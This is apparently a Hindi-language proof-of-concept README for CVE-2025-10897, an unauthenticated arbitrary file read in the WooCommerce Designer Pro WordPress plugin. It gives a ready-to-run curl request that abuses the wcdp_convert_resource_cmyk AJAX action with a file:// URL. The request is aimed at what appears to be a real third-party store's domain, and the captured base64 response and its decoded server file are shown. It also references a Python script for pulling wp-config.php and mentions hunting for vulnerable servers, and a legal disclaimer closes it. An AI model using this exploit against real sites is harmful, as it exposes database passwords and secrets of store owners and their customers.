
WooCommerce Designer Pro <= 1.9.28 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ना
WooCommerce वर्डप्रेस के लिए एक ओपन-सोर्स ई-कॉमर्स प्लगइन है जो वेबसाइटों को ऑनलाइन स्टोर में बदल देता है। WooCommerce Designer Pro JMA Plugins द्वारा विकसित एक वर्डप्रेस प्लगइन है जो ग्राहकों को WooCommerce स्टोर पर सीधे उत्पादों को डिज़ाइन और कस्टमाइज़ करने में सक्षम बनाता है।
महत्वपूर्ण: WooCommerce और WooCommerce Designer Pro पूरी तरह से अलग हैं।
WooCommerce Designer Pro बिज़नेस कार्ड, पोस्टकार्ड, फ़्लायर्स, पोस्टर, टी-शर्ट, स्टिकर और अन्य प्रिंट योग्य सामग्री बनाने का समर्थन करता है, जिसमें CMYK रंग समर्थन, PDF जनरेशन और कैनवास-आधारित डिज़ाइन इंटरफ़ेस जैसी सुविधाएँ शामिल हैं। प्लगइन खरीद से पहले वास्तविक समय में उत्पाद कस्टमाइज़ेशन की अनुमति देने के लिए WooCommerce के साथ एकीकृत होता है, जिससे यह ऑनलाइन प्रिंटिंग व्यवसायों और कस्टम मर्चेंडाइज़ स्टोर के लिए उपयुक्त बनता है।
CVE-2025-10897, WooCommerce Designer Pro के 1.9.28 तक के संस्करणों में एक बिना प्रमाणीकरण वाला मनमाना फ़ाइल पठन है (CWE-22)। एक हमलावर action=wcdp_convert_resource_cmyk और /etc/passwd या wp-config.php जैसी सर्वर फ़ाइलों की ओर इशारा करते हुए file:// URL के साथ POST /wp-admin/admin-ajax.php भेजता है। प्लगइन JSON प्रतिक्रिया में फ़ाइल की सामग्री लौटाता है। इससे बिना किसी WordPress खाते के wp-config.php से डेटाबेस पासवर्ड और अन्य रहस्य लीक हो सकते हैं।
अनुरोध
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
प्रतिक्रिया
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}
Base64 डिकोड की गई प्रतिक्रिया:
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
python CVE-2025-10897-X7.py
नोट: हमारा PoC स्क्रिप्ट wp-config.php प्राप्त करने का प्रयास करता है, लेकिन लक्ष्य पर WordPress /var/www से भिन्न स्थान पर स्थापित हो सकता है।
कमजोर सर्वरों की खोज के लिए तर्क
यह रिपॉजिटरी और इसकी सामग्री केवल वैध सुरक्षा अनुसंधान, अधिकृत पेनिट्रेशन परीक्षण, शैक्षिक अध्ययन और रक्षात्मक उद्देश्यों के लिए प्रदान की जाती है। इस सामग्री तक पहुँचने या इसका उपयोग करने से, आप यह सुनिश्चित करने की पूर्ण ज़िम्मेदारी स्वीकार करते हैं कि आपकी गतिविधियाँ सभी लागू कानूनों का अनुपालन करती हैं और आपने किसी भी ऐसी प्रणाली के विरुद्ध इन तकनीकों का परीक्षण या अनुप्रयोग करने से पहले उचित अधिकार प्राप्त कर लिया है जो आपके स्वामित्व में नहीं है।
इस परियोजना के लेखक और अनुरक्षक इस जानकारी के अनुप्रयोग से उत्पन्न किसी भी क्षति, कानूनी परिणाम या दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं। अनधिकृत पहुँच, दुर्भावनापूर्ण गतिविधि या अवैध उद्देश्यों के लिए कोई भी उपयोग स्पष्ट रूप से निषिद्ध और असमर्थित है।
जिम्मेदारी से उपयोग करें। कानूनी बने रहें। केवल उन्हीं चीज़ों का परीक्षण करें जो आपके स्वामित्व में हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
SCT-PL